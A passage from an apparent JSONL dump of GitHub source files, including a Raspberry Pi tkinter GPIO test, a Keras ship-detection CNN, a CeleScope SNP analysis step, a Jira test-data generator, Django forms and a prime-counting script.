),\n]\n\n","repo_name":"Pruthvi2121/Data-Vitulization-Dashboard","sub_path":"backend/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11202666844","text":"\"\"\"\nForget all the nice Object Oreintd Programming for now \nand just throw a few lables and control buttons on to a\ntkinter screen to test out the cheap QUIMAT touch screen\nwith the I2C 32 GPIO priopedia interace also plugged in\n\"\"\"\nimport tkinter as tk \nfrom tkinter import ttk\n# access the i2c 32xGPIO interface\nimport smbus\nbus = smbus.SMBus(0) # 0 for the original RPi, 1 for the newer version\n# using the I2C 32 GPIO priopedia interace set all of J23 to outputs\nbus.write_byte_data(0x20,0x00,0x00)\n# now set up the touch screen control buttons for the first output on J23\nwin = tk.Tk() \nwin.title(\"RPi GUI\") \n# Add a helpful Label\nttk.Label(win, text=\"Test GPIO interface\").grid(column=0, row=0)\n# A dirty bodge to put a bit of space into the window\nttk.Label(win, text=\"\").grid(column=0, row=1)\nttk.Label(win, text=\"\").grid(column=0, row=3)\nttk.Label(win, text=\"\").grid(column=0, row=5)\n\n# Button Click Functions\ndef clickOn():\n bus.write_byte_data(0x20,0x12,0x00)\ndef clickOff():\n bus.write_byte_data(0x20,0x12,0x01)\n\n# Adding a Button\naction1 = ttk.Button(win, text=\"Click on\", command=clickOn)\n# Position Button in second row (zero-based)\naction1.grid(column=0, row=2)\n# Adding a Button\naction2 = ttk.Button(win, text=\"Click off\", command=clickOff)\n# Position Button \naction2.grid(column=0, row=4)\n# Adding a Button\naction3 = ttk.Button(win, text=\"QUIT\", command=quit)\n# Position Button \naction3.grid(column=0, row=6)\n# Start the touch screen interface\nwin.mainloop()\n","repo_name":"doubledodge/Python-RPi-touchscreen","sub_path":"hello2.py","file_name":"hello2.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39874997383","text":"import robot_actuator\nimport robot_sensor\nimport rospy\n\nclass Robot:\n def __init__(self,robot_name=''):\n self.actuators=[]\n self.sensors=[]\n self.robot_name=robot_name\n\n def act_once(self, actions):\n for i in range(len(self.actuators)):\n self.actuators[i].act_once(actions[i])\n\n def observe_once(self):\n observation = []\n for sensor in self.sensors:\n sensor.wait_new_msg()\n finish = False\n while not finish:\n rospy.rostime.wallsleep(0.01)\n finish = True\n for sensor in self.sensors:\n finish = finish and sensor.check_new_msg()\n for sensor in self.sensors:\n observation.append(sensor.get_last_msg())\n return observation\n\n def get_last_ob(self):\n observation=[]\n for sensor in self.sensors:\n observation.append(sensor.get_last_msg())\n return observation\n\n def begin_observation(self):\n for sensor in self.sensors:\n sensor.wait_new_msg()\n\n def check_observation(self):\n for sensor in self.sensors:\n if sensor.check_new_msg() == False:\n return False\n return True\n\n","repo_name":"chesternimiz/multi_robot_gym","sub_path":"multi_robot_gym/src/multi_robot_gym/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"11057872209","text":"#!/usr/bin/env python 3\r\n\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\npathway = \"C:/Users/soubi/OneDrive/Bureau/Travail/Calf1Calf2/\"\r\nneq_WT = np.loadtxt('{}Calf1Calf2_WT/Neq/CC_WT_traj_all_global.PB.Neq.txt'.format(pathway))\r\nneq_H798P = np.loadtxt('{}Calf1Calf2_H798P/PBxplore/md_CC_H798P_traj_all.PB.Neq.txt'.format(pathway))\r\n\r\nneq1 = neq_WT[:,1]\r\nneq2 = neq_H798P[:,1]\r\ndelta_neq = abs(neq1 - neq2)\r\nx = neq_WT[:,0]\r\n\r\nplt.xlabel(\"Residues\")\r\nplt.ylabel('Delta Neq')\r\nplt.title(\"Delta Neq WT vs H798P\")\r\nplt.plot(x, delta_neq)\r\n#plt.plot(neq1[:,0], neq1[:,1], color = 'r')\r\n#plt.plot(neq2[:,0], neq2[:,1], color = 'g')\r\nplt.show()\r\n\r\n'''\r\ndico_neq_H798P = {}\r\nfor i in neq1[:,0] :\r\n\tcol1 = i\r\n\tcol2 = delta_neq\r\n\tif col1 not in dico_neq_H798P.keys():\r\n\t\tdico_neq_H798P[col1] = col2\r\n\r\nfor key, val in dico_neq_H798P.items():\r\n\tprint(val)\r\n'''\r\n'''\r\ndico = {}\r\nfor i, j in zip(list(range(603,960)),delta_neq) :\r\n\tdico[i] = j\r\nfor k, v in dico.items() :\r\n\tif v >= 2 :\r\n\t\tprint(k, v)\r\n'''\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Soubika/StageM2","sub_path":"DNeq.py","file_name":"DNeq.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71426929960","text":"import pandas as pd\nimport numpy as np\n\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.preprocessing.image import load_img\nfrom keras.preprocessing.image import img_to_array\nfrom keras.models import Sequential\nfrom keras.layers import Convolution2D\nfrom keras.layers import MaxPooling2D\nfrom keras.layers import Dense\nfrom keras.layers import Flatten\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import SGDClassifier\n\nimport seaborn as sns\n\nfrom tqdm import tqdm\nimport os\n# Initialize global variables\nSAMPLE_SIZE = 10000\nBATCH_SIZE = 32\nTEST_PERC = 0.2\nsegmentations = pd.read_csv(\"../input/train_ship_segmentations.csv\")\nsegmentations['path'] = '../input/train/' + segmentations['ImageId']\nsegmentations.shape\nsegmentations = segmentations.sample(n=SAMPLE_SIZE)\ndef has_ship(encoded_pixels):\n hs = [0 if pd.isna(n) else 1 for n in tqdm(encoded_pixels)]\n return hs\nsegmentations['HasShip'] = has_ship(segmentations['EncodedPixels'].values)\nsegmentations['HasShip'].head()\nsegmentations.head()\nsns.countplot(segmentations['HasShip'])\nnp.shape(load_img(segmentations['path'].values[0]))\ntrain,test = train_test_split(segmentations, test_size=TEST_PERC)\nidg_train = ImageDataGenerator(rescale=1. / 255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\n\nidg_test = ImageDataGenerator(rescale=1. / 255)\ndef flow_from_dataframe(img_data_gen, in_df, path_col, y_col, **dflow_args):\n base_dir = os.path.dirname(in_df[path_col].values[0])\n print('## Ignore next message from keras, values are replaced anyways')\n df_gen = img_data_gen.flow_from_directory(base_dir, \n class_mode = 'sparse',\n **dflow_args)\n df_gen.filenames = in_df[path_col].values\n df_gen.classes = np.stack(in_df[y_col].values)\n df_gen.samples = in_df.shape[0]\n df_gen.n = in_df.shape[0]\n df_gen._set_index_array()\n df_gen.directory = '' # since we have the full path\n print('Reinserting dataframe: {} images'.format(in_df.shape[0]))\n return df_gen\ntrain_images = flow_from_dataframe(idg_train, train, 'path', 'HasShip', batch_size=BATCH_SIZE, target_size=(256, 256))\ntest_images = flow_from_dataframe(idg_train, test, 'path', 'HasShip', batch_size=BATCH_SIZE, target_size=(256, 256))\ntrain_images.target_size\nmodel = Sequential()\nmodel.add(Convolution2D(32, (3, 3),\n input_shape=(256, 256, 3),\n activation='relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Convolution2D(32, (3, 3),\n input_shape=(256, 256, 3),\n activation='relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Convolution2D(32, (3, 3),\n input_shape=(256, 256, 3),\n activation='relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten())\n\nmodel.add(Dense(units=128, activation='relu', kernel_initializer='normal'))\nmodel.add(Dense(units=1, activation='sigmoid', kernel_initializer='normal'))\n\nmodel.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['accuracy'])\nmodel.summary()\nfitted_model = model.fit_generator(train_images,\n steps_per_epoch=SAMPLE_SIZE*(1-TEST_PERC)/BATCH_SIZE,\n epochs=20,\n validation_data=test_images,\n validation_steps=SAMPLE_SIZE*(TEST_PERC)/BATCH_SIZE)\nimport matplotlib.pyplot as plt\nimport pylab\n\n\npath = 'results'\nname = 'adam'\n\nplt.plot(fitted_model.history['acc'])\nplt.plot(fitted_model.history['val_acc'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\n\nplt.show()\nplt.figure()\nplt.gcf().clear()\nplt.plot(fitted_model.history['loss'])\nplt.plot(fitted_model.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\n\nplt.show()\n\n","repo_name":"aorursy/new-nb-3","sub_path":"grigorbezirganyan_detect-if-there-is-a-ship-by-cnn-base-model.py","file_name":"grigorbezirganyan_detect-if-there-is-a-ship-by-cnn-base-model.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23227278716","text":"def grid_search_cv(x_train,y_train,gbrt,param_grid,cv=10,random_state=43,verbose=0):\n start = datetime.now()\n kinds = np.prod([len(i) for i in param_grid.values()])\n print('开始时间{}, 共计{}种'.format(start,kinds))\n \n grid_search = GridSearchCV(estimator=gbrt,param_grid=param_grid,cv=cv,verbose=verbose,return_train_score=True)\n grid_search.fit(x_train,y_train)\n \n end = datetime.now()\n seconds =(end - start).seconds\n print('grid_search_cv, 共计{}种,用时{}秒'.format(kinds,seconds))\n \n return grid_search.cv_results_,grid_search.best_params_\n","repo_name":"richzw/MachineLearningTips","sub_path":"sklearn/Grid_Search.py","file_name":"Grid_Search.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26447760330","text":"import subprocess\nimport os\nimport warnings\n\nimport scanpy as sc\nimport pandas as pd\nimport pysam\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom celescope.tools import utils\nfrom celescope.tools.step import Step\nfrom celescope.tools.step import s_common\nfrom celescope.tools.target_metrics import get_gene_list\nfrom celescope.__init__ import HELP_DICT\nfrom celescope.snp.__init__ import PANEL\n\n\nmatplotlib.use('Agg')\nwarnings.filterwarnings(\"ignore\")\n\nAA_DICT = {\n 'Gly' : 'G',\n 'Ala' : 'A',\n 'Val' : 'V',\n 'Leu' : 'L',\n 'Ile' : 'I',\n 'Phe' : 'F',\n 'Trp' : 'W',\n 'Tyr' : 'Y',\n 'Asp' : 'D',\n 'Asn' : 'N',\n 'Glu' : 'E',\n 'Lys' : 'K',\n 'Gln' : 'Q',\n 'Met' : 'M',\n 'Ser' : 'S',\n 'Thr' : 'T',\n 'Cys' : 'C',\n 'Pro' : 'P',\n 'His' : 'H',\n 'Arg' : 'R',\n}\n\n\ndef parse_variant_ann(variant_ann_file):\n \"\"\"\n Args:\n variant_ann_file: variant annotation file from snpEff.\n \n Returns:\n gene_list, mRNA_list, protein_list\n \"\"\"\n gene_list, mRNA_list, protein_list = [], [], []\n\n with open(variant_ann_file) as f:\n for line in f.readlines():\n if not line.startswith(\"#\"):\n info = line.split('\\t')[7]\n anns = info.split(\"|\")\n gene = anns[3]\n gene_list.append(gene)\n \n tmp1, tmp2 = [], []\n for ann in anns:\n if ann.startswith(\"c.\"):\n exon_loc = anns[anns.index(ann) - 1].split('/')[0]\n # WARNING_TRANSCRIPT_INCOMPLETE\n if not exon_loc:\n continue\n \n exon = ann.strip(\"c.\")\n exon = f\"exon{exon_loc}:{exon}\"\n if exon not in tmp1:\n tmp1.append(exon)\n\n if ann.startswith(\"p.\"):\n protein = ann[2:]\n for i in AA_DICT:\n protein = protein.replace(i, AA_DICT[i])\n if protein not in tmp2:\n tmp2.append(protein)\n \n mRNA_list.append(','.join(tmp1))\n protein_list.append(','.join(tmp2))\n\n return (gene_list, mRNA_list, protein_list)\n\n\ndef parse_vcf_to_df(vcf_file, cols=('chrom', 'pos', 'alleles'), infos=('VID', 'CID')):\n \"\"\"\n Read cols and infos into pandas df\n \"\"\"\n vcf = pysam.VariantFile(vcf_file)\n df = pd.DataFrame(columns=[col.capitalize() for col in cols] + infos)\n rec_dict = {}\n for rec in vcf.fetch():\n\n for col in cols:\n rec_dict[col.capitalize()] = getattr(rec, col)\n if col == 'alleles':\n rec_dict['Alleles'] = '-'.join(rec_dict['Alleles'])\n\n for info in infos:\n rec_dict[info] = rec.info[info]\n\n '''\n rec_dict['GT'] = [s['GT'] for s in rec.samples.values()][0]\n rec_dict['GT'] = [str(item) for item in rec_dict['GT']]\n rec_dict['GT'] = '/'.join(rec_dict['GT'])\n '''\n df_new = pd.DataFrame(rec_dict, index=[0])\n df = pd.concat([df, df_new])\n\n vcf.close()\n df.reset_index(drop=True, inplace=True)\n return df\n\n\ndef vcf_to_gt_csv(vcf_file, csv_file):\n vcf = pysam.VariantFile(vcf_file)\n \n samples = vcf.header.samples\n \n with open(csv_file, 'w') as f:\n header = ['variant'] + list(samples)\n f.write(','.join(header) + '\\n')\n \n for record in vcf:\n mutation_name = f\"{record.chrom}_{record.pos}\"\n genotypes = []\n \n for sample in samples:\n genotype = record.samples[sample]['GT']\n g1, g2 = genotype\n \n if g1 is None:\n genotype_str = \"NA\"\n else:\n genotype_str = '/'.join([str(g1),str(g2)])\n \n genotypes.append(genotype_str)\n \n line = [mutation_name] + genotypes\n f.write(','.join(line) + '\\n')\n\n\nclass Analysis_snp(Step):\n \"\"\"\n ## Features\n - Annotate variants with [snpEff](http://pcingola.github.io/SnpEff/).\n\n ## Output\n - `{sample}_gt.csv` Genotypes of variants of each cell. Rows are variants and columns are cells.\n - `{sample}_variant_ncell.csv` Number of cells with each genotype.\n - `{sample}_variant_table.csv` annotated with snpEff.\n\n \"\"\"\n\n def __init__(self, args, display_title=None):\n super().__init__(args, display_title)\n self.vcf_file = args.vcf\n\n # parse\n self.gene_list, self.n_gene = get_gene_list(args)\n self.database = args.database\n\n # data\n self.variant_table = None\n\n # out\n self.snpeff_outdir = f'{self.outdir}/snpEff/'\n self.snpeff_ann_vcf_file = f'{self.snpeff_outdir}/variants_ann.vcf'\n self.final_vcf_file = f'{self.out_prefix}_final.vcf'\n utils.check_mkdir(self.snpeff_outdir)\n self.plot_snp_dir = f'{self.outdir}/{self.sample}_plot_snp/'\n\n self.gt_file = f'{self.out_prefix}_gt.csv'\n self.ncell_file = f'{self.out_prefix}_variant_ncell.csv'\n self.variant_table_file = f'{self.out_prefix}_variant_table.csv'\n\n @utils.add_log\n def write_gt(self):\n vcf_to_gt_csv(self.final_vcf_file, self.gt_file)\n\n @utils.add_log\n def write_ncell(self):\n \"\"\"\n parse gt_file to collect each genotype cell count into ncell_file\n \"\"\"\n df = pd.read_csv(self.gt_file, index_col=0)\n df_ncell = df.apply(pd.Series.value_counts, axis=1).fillna(0).astype(int)\n df_ncell.to_csv(self.ncell_file, index=True)\n\n @utils.add_log\n def run_snpEff(self):\n cmd = (\n f\"snpEff -Xmx8g -v {self.database} {os.path.abspath(self.vcf_file)} > variants_ann.vcf \"\n )\n self.run_snpEff.logger.info(cmd)\n\n cwd = os.getcwd()\n os.chdir(self.snpeff_outdir)\n subprocess.check_call(cmd, shell=True)\n # change dir back to avoid can not find '09.analysis_snp/stat.txt' error\n os.chdir(cwd)\n\n @utils.add_log\n def keep_in_gene(self):\n \"\"\"\n Output:\n self.final_vcf_file\n \"\"\"\n gene_list, _, _ = parse_variant_ann(self.snpeff_ann_vcf_file)\n with pysam.VariantFile(self.snpeff_ann_vcf_file) as vcf_in:\n with pysam.VariantFile(self.final_vcf_file, 'w', header=vcf_in.header) as vcf_out:\n for i, record in enumerate(vcf_in.fetch()):\n if gene_list[i] in self.gene_list:\n vcf_out.write(record) \n\n\n def get_variant_table(self):\n \"\"\"\n Returns:\n is_in_gene_list: if res[i] == True, line i is in gene_list\n \"\"\"\n\n df_vcf = parse_vcf_to_df(self.final_vcf_file, infos=[])\n df_vcf[\"Gene\"], df_vcf[\"mRNA\"], df_vcf[\"Protein\"] = parse_variant_ann(self.final_vcf_file)\n df_ncell = pd.read_csv(self.ncell_file)\n df_vcf = pd.concat([df_vcf, df_ncell], axis=1)\n\n cols = [\"Chrom\", \"Pos\", \"Alleles\", \"Gene\", \"0/0\", \"0/1\", \"1/1\", \"mRNA\", \"Protein\"]\n cols = [col for col in cols if col in df_vcf.columns]\n df_vcf = df_vcf.loc[:, cols]\n is_in_gene_list = df_vcf.Gene.isin(self.gene_list)\n df_vcf = df_vcf[is_in_gene_list]\n\n self.variant_table = df_vcf\n self.variant_table.reset_index(drop=True, inplace=True)\n self.variant_table.to_csv(self.variant_table_file, index=False)\n\n def add_help(self):\n '''\n

    Chrom : chromosome name.

    \n

    Pos : the 1-based position of the variation on the given sequence..

    \n

    Alleles : REF(reference base or bases in the case of an indel) - ALT(alternative alleles).

    \n

    0/0, 0/1, 1/1: number of cells with each genotype.

    \n

    Gene : gene symbol.

    \n

    mRNA : A standard nomenclature is used in specifying the sequence changes.

    \n

    Protein : A standard nomenclature is used in specifying the sequence changes.

    \n '''\n self.add_help_content(\n name='Chrom',\n content='Chromosome name'\n )\n self.add_help_content(\n name='Pos',\n content='the 1-based position of the variation on the given sequence'\n )\n self.add_help_content(\n name='Alleles',\n content='REF(reference base or bases in the case of an indel) - ALT(alternative alleles)'\n )\n self.add_help_content(\n name='0/0, 0/1, 1/1',\n content='number of cells with each genotype'\n )\n self.add_help_content(\n name='Gene',\n content='gene symbol'\n )\n self.add_help_content(\n name='mRNA',\n content='A standard nomenclature is used in specifying the sequence changes'\n )\n self.add_help_content(\n name='Protein',\n content='A standard nomenclature is used in specifying the sequence changes'\n )\n\n @utils.add_log\n def plot_snp(self):\n match_dict = utils.parse_match_dir(self.args.match_dir)\n if 'h5ad' not in match_dict:\n return\n\n utils.check_mkdir(self.plot_snp_dir)\n df_gt = pd.read_csv(self.gt_file, keep_default_na=False, index_col=0)\n df_v = self.variant_table.copy()\n df_v['n_variants'] = df_v['0/1'] + df_v['1/1']\n indices = df_v.nlargest(self.args.plot_top_n, 'n_variants').index\n df_top = df_gt.iloc[indices,]\n df_top = df_top.transpose()\n variants = df_top.columns\n for c in variants:\n df_top[c] = df_top[c].astype('category')\n\n adata = sc.read_h5ad(match_dict['h5ad'])\n adata.obs = pd.concat([adata.obs, df_top], axis=1)\n pt_size = min(100, 120000 / len(adata.obs))\n gene_list, protein_list = df_v['Gene'], df_v['Protein']\n for i, v in enumerate(variants):\n title = f'top{i+1}_{variants[i]}_{gene_list[indices[i]]}_{protein_list[indices[i]]}'\n file_name = f'{self.plot_snp_dir}/{title}.pdf'\n sc.pl.umap(adata, color=v, size=pt_size, \n palette={'0/0':'dimgray', '0/1':'orange', '1/1':'red','NA':'lightgray'},\n title=title)\n plt.savefig(file_name,dpi=300,bbox_inches=\"tight\")\n\n\n\n def run(self):\n self.run_snpEff()\n self.keep_in_gene()\n self.write_gt()\n self.write_ncell()\n self.get_variant_table()\n self.add_help()\n self.plot_snp()\n table_dict = self.get_table_dict(title='Variant table', table_id='variant', df_table=self.variant_table)\n self.add_data(table_dict=table_dict)\n\n\n@utils.add_log\ndef analysis_snp(args):\n with Analysis_snp(args, display_title='Analysis') as runner:\n runner.run()\n\n\ndef get_opts_analysis_snp(parser, sub_program):\n parser.add_argument(\"--gene_list\", help=HELP_DICT['gene_list'])\n parser.add_argument(\"--database\", help='snpEff database. Common choices are GRCh38.mane.1.0.ensembl(human) and GRCm38.99(mouse)', default='GRCh38.mane.1.0.ensembl')\n parser.add_argument(\"--panel\", help=HELP_DICT['panel'], choices=list(PANEL))\n parser.add_argument(\"--plot_top_n\", type=int, help='plot UMAP of at most n variants ', default=20)\n if sub_program:\n s_common(parser)\n parser.add_argument('--match_dir', help=HELP_DICT['match_dir'], required=True)\n parser.add_argument('--vcf', help='vcf file.', required=True)\n","repo_name":"singleron-RD/CeleScope","sub_path":"celescope/snp/analysis_snp.py","file_name":"analysis_snp.py","file_ext":"py","file_size_in_byte":11606,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"18"} +{"seq_id":"25651205431","text":"import json\nimport pathlib\nfrom base64 import b64encode\nfrom typing import Any, List, Mapping\n\nfrom airbyte_cdk.sources.streams.http.auth import TokenAuthenticator\nfrom streams import (\n DashboardsGenerator,\n FiltersGenerator,\n FilterSharingGenerator,\n GroupsGenerator,\n IssueCommentsGenerator,\n IssueFieldsGenerator,\n IssueRemoteLinksGenerator,\n IssuesGenerator,\n IssueVotesGenerator,\n IssueWatchersGenerator,\n ProjectCategoriesGenerator,\n ProjectComponentsGenerator,\n ProjectsGenerator,\n ProjectVersionsGenerator,\n ScreensGenerator,\n UsersGenerator,\n WorkflowSchemesGenerator,\n WorkflowsGenerator,\n)\n\n\nclass Generator:\n base_config_path = \"secrets/config.json\"\n\n def __init__(self):\n self.configs = None\n super(Generator, self).__init__()\n\n def _get_configs(self):\n if not self.configs:\n source_directory = pathlib.Path(__file__).resolve().parent.parent.parent.parent\n configs_path = source_directory.joinpath(self.base_config_path)\n with open(configs_path) as json_configs:\n self.configs = json.load(json_configs)\n return self.configs\n\n @staticmethod\n def _get_authenticator(config: Mapping[str, Any]):\n token = b64encode(bytes(config[\"email\"] + \":\" + config[\"api_token\"], \"utf-8\")).decode(\"ascii\")\n authenticator = TokenAuthenticator(token, auth_method=\"Basic\")\n return authenticator\n\n def streams(self) -> List:\n config = self._get_configs()\n authenticator = self._get_authenticator(config)\n args = {\"authenticator\": authenticator, \"domain\": config[\"domain\"]}\n return [\n DashboardsGenerator(**args),\n FiltersGenerator(**args),\n FilterSharingGenerator(**args),\n GroupsGenerator(**args),\n IssuesGenerator(**args),\n IssueCommentsGenerator(**args),\n IssueFieldsGenerator(**args),\n IssueRemoteLinksGenerator(**args),\n IssueVotesGenerator(**args),\n IssueWatchersGenerator(**args),\n ProjectsGenerator(**args),\n ProjectCategoriesGenerator(**args),\n ProjectComponentsGenerator(**args),\n ProjectVersionsGenerator(**args),\n ScreensGenerator(**args),\n UsersGenerator(**args),\n WorkflowsGenerator(**args),\n WorkflowSchemesGenerator(**args),\n ]\n\n def run(self):\n for stream in self.streams():\n stream.generate()\n\n\nif __name__ == \"__main__\":\n generator = Generator()\n generator.run()\n","repo_name":"datasphere-oss/datasphere-databyte","sub_path":"airbyte-integrations/connectors/source-jira/integration_tests/fixtures/data_generator/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11134001730","text":"from django.contrib.auth.forms import AuthenticationForm, UserChangeForm\nfrom .models import EPS, CustomUser, TipoUsuario, InfoMiembros, TipoDocumento, EstadoCivil, RegimenSeguridad, Sexo, Etnia\nfrom django import forms\nfrom django.utils.html import format_html\n\n\nclass FiltroUsuarios(forms.Form):\n nombre = forms.CharField(\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n id_usuario = forms.IntegerField(\n required=False,\n widget=forms.NumberInput(attrs={'class': 'form-control'})\n )\n documento_usuario = forms.CharField(\n max_length=20,\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n\nclass FiltroPacientes(forms.Form):\n nombre = forms.CharField(\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n documento_paciente = forms.CharField(\n max_length=20,\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n\n \n \n\nclass FiltroLlamadasForm(forms.Form):\n id_llamada = forms.IntegerField(\n required=False,\n widget=forms.NumberInput(attrs={'class': 'form-control'})\n )\n \n id_profesional = forms.IntegerField(\n required=False,\n widget=forms.NumberInput(attrs={'class': 'form-control '})\n )\n \n documento_paciente = forms.CharField(\n max_length=20,\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n \n fecha_llamada = forms.DateField(\n required=False,\n widget=forms.DateInput(attrs={'type': 'date', 'class': 'form-control'})\n )\n \n solo_hechas_por_mi = forms.BooleanField(\n required=False,\n widget=forms.CheckboxInput(attrs={'class': 'form-check-input'})\n )\n\nclass FiltroCitasForm(forms.Form):\n id_cita = forms.IntegerField(\n required=False,\n widget=forms.NumberInput(attrs={'class': 'form-control'})\n )\n \n id_profesional = forms.IntegerField(\n required=False,\n widget=forms.NumberInput(attrs={'class': 'form-control '})\n )\n documento_paciente = forms.CharField(\n max_length=20,\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n fecha_cita = forms.DateField(\n required=False,\n widget=forms.DateInput(attrs={'type': 'date', 'class': 'form-control'})\n )\n solo_hechas_por_mi = forms.BooleanField(\n required=False,\n widget=forms.CheckboxInput(attrs={'class': 'form-check-input'})\n )\n\nclass CustomUserRegistrationForm(forms.ModelForm):\n username = forms.CharField(\n label='Nombre de usuario',\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Nombre de usuario'})\n )\n email = forms.EmailField(\n label='Correo electrónico',\n widget=forms.EmailInput(attrs={'class': 'form-control', 'placeholder': 'Correo electrónico'})\n )\n password = forms.CharField(\n label='Contraseña',\n widget=forms.PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Contraseña'})\n )\n password2 = forms.CharField(\n label='Confirmar contraseña',\n widget=forms.PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Confirmar contraseña'})\n )\n tipo_usuario = forms.ModelChoiceField(\n label='Seleccione tipo de usuario',\n queryset=TipoUsuario.objects.all(),\n widget=forms.Select(attrs={'class': 'custom-class form-select', 'id': 'custom-id'}),\n empty_label='Selecciona un tipo de usuario'\n )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['password2'].label = 'Confirmar contraseña'\n\n class Meta:\n model = CustomUser\n fields = ('username', 'email', 'password', 'password2', 'tipo_usuario')\n\n\n\nclass AutodataForm(forms.ModelForm):\n tipo_documento = forms.ModelChoiceField(\n queryset=TipoDocumento.objects.all(),\n widget=forms.Select(attrs={\n 'class': 'form-select',\n 'id': 'id_tipo_documento'\n }),\n empty_label=\"Selecciona tu tipo de documento\"\n )\n estado_civil = forms.ModelChoiceField(\n queryset=EstadoCivil.objects.all(),\n widget=forms.Select(attrs={\n 'class': 'form-select',\n 'id': 'id_estado_civil'\n }),\n empty_label=\"Selecciona tu estado civil\"\n )\n regimen_seguridad = forms.ModelChoiceField(\n queryset=RegimenSeguridad.objects.all(),\n widget=forms.Select(attrs={\n 'class': 'form-select',\n 'id': 'id_regimen_seguridad'\n }),\n empty_label=\"Selecciona tu régimen de seguridad\"\n )\n sexo = forms.ModelChoiceField(\n queryset=Sexo.objects.all(),\n widget=forms.Select(attrs={\n 'class': 'form-select',\n 'id': 'id_sexo'\n }),\n empty_label=\"Selecciona tu sexo\"\n )\n etnia = forms.ModelChoiceField(\n queryset=Etnia.objects.all(),\n widget=forms.Select(attrs={\n 'class': 'form-select',\n 'id': 'id_etnia'\n }),\n empty_label=\"Selecciona tu Etnia\"\n )\n eps = forms.ModelChoiceField(\n queryset=EPS.objects.all(),\n widget=forms.Select(attrs={'class': 'form-select', 'id': 'id_nombre_eps'})\n )\n\n # Agregar campos restantes con estilos Bootstrap\n nombre = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'id': 'id_nombre'}))\n documento = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'id': 'id_documento'}))\n numero_hijos = forms.IntegerField(widget=forms.NumberInput(attrs={'class': 'form-control', 'id': 'id_numero_hijos'}))\n direccion = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'id': 'id_direccion'}))\n barrio = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'id': 'id_barrio'}))\n celular = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'id': 'id_celular'}))\n sisben = forms.BooleanField(widget=forms.CheckboxInput(attrs={'class': 'form-check-input', 'id':'sisben'}),\n required=False)\n class Meta:\n model = InfoMiembros\n fields = ('nombre', 'tipo_documento', 'documento', 'estado_civil', 'numero_hijos', 'etnia',\n 'direccion', 'barrio', 'celular', 'sisben', 'eps', 'regimen_seguridad', 'sexo',)\n\n\nclass CustomUserLoginForm(AuthenticationForm):\n username = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}))\n password = forms.CharField(\n widget=forms.PasswordInput(attrs={'class': 'form-control'}))\n\n","repo_name":"DavidMojicaDev/T3","sub_path":"main/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9707497421","text":"# !usr/bin/env python3\r\n\r\n\"\"\"Counts the number of primes from 2 to a user-specified limit.\r\nA number is considered prime if it is greater than or equal to 2,\r\nand its only factors are 1 and itself.\r\n\"\"\"\r\n\r\nimport cProfile\r\nimport pstats\r\nfrom math import isqrt\r\n\r\n\r\ndef count_primes(limit: int) -> int:\r\n \"\"\"Returns the number of primes from 2 to the limit specified.\"\"\"\r\n primes = set(range(3, limit + 1, 2))\r\n for i in range(3, isqrt(limit) + 1, 2):\r\n if i in primes:\r\n primes.difference_update(range(i ** 2, limit + 1, i))\r\n return len(primes) + 1\r\n\r\n\r\ndef main(n: int = 100_000) -> None:\r\n with cProfile.Profile() as pr:\r\n print(count_primes(n))\r\n pr.print_stats(pstats.SortKey.TIME)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n 